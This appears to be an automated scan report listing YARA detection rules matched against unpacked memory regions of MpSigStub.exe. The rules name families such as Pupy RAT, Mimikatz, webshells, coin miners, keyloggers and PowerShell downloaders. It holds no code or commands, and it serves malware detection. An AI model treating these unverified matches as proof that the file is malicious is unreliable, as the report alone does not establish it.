    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 35.3.MpSigStub.exe.28bd63ac0ae.183.raw.unpack, type: UNPACKEDPEMatched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd66af16e.159.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd78ce0e6.54.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
    Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPEMatched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPEMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPEMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
    Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd6625a01.91.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
    Source: 35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd69007f6.71.raw.unpack, type: UNPACKEDPEMatched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
    Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPEMatched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
    Source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
    Source: 35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd700b2de.97.raw.unpack, type: UNPACKEDPEMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd64bea82.66.raw.unpack, type: UNPACKEDPEMatched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd66afd72.161.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7361111.94.raw.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd66ae56a.160.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd78ce0e6.60.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPEMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPEMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
    Source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPEMatched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
    Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
    Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
    Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPEMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPEMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
    Source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7b2bc01.138.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
